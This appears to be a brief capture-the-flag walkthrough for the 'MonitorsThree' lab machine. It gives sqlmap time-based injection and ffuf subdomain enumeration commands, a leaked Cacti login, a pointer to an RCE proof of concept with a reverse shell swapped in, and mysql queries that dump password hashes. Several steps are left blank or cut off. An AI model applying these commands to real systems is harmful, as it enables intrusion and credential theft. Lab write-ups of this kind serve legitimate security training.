MonitorsThree¶
Linux machine
Foothold¶
Do not forget to update the /etc/hosts file.
Nmap port scan¶
visit the website. We will find login and "request password change" page.
We will try using sqlmap.
Since its time-based injection, try to predict and optimise the command:
sqlmap -u http://monitorsthree.htb/forgot_password.php --data username=asd -p username -D monitorsthree_db -T users -C password --dump --time-sec 1 --where "username='admin'"
crack the md5 password (first save the hash into file):
result:
Next we can enumerate subdomains:
ffuf -w /usr/share/wordlists/dirb/big.txt -H "Host: FUZZ.monitorsthree.htb" -u http://monitorsthree.htb -fs 1590
We found a cacti subdomain. Add it to /etc/hosts. Use the found credentials.
Optionally we can try to check for the users, since the response is different when the user exists. ("Login failed" vs "Login Failed")
Use admin:greencacti2001.
Search for an exploit for the cacti 1.2.26 version.
We find https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88.
Use the poc to generate the payload (copy the contents into a file, update the dummy code with reverse shell, preferably python reverse shell) and follow the instructions.
Do not forget to start a shell listener.
User¶
Find a database credentials in the application (in /var/www/html/cacti/include/config.php).
In the database, there is a users table, we want the marcus user password.
mysql -u cactiuser -p <<< cactiuser
show databases;
use cacti;
show tables;
select * from user_auth;
Crack it:
result:
Now we login as marcus, use the password we just found:
Read the user flag.
Root¶
Use the
Read the flag.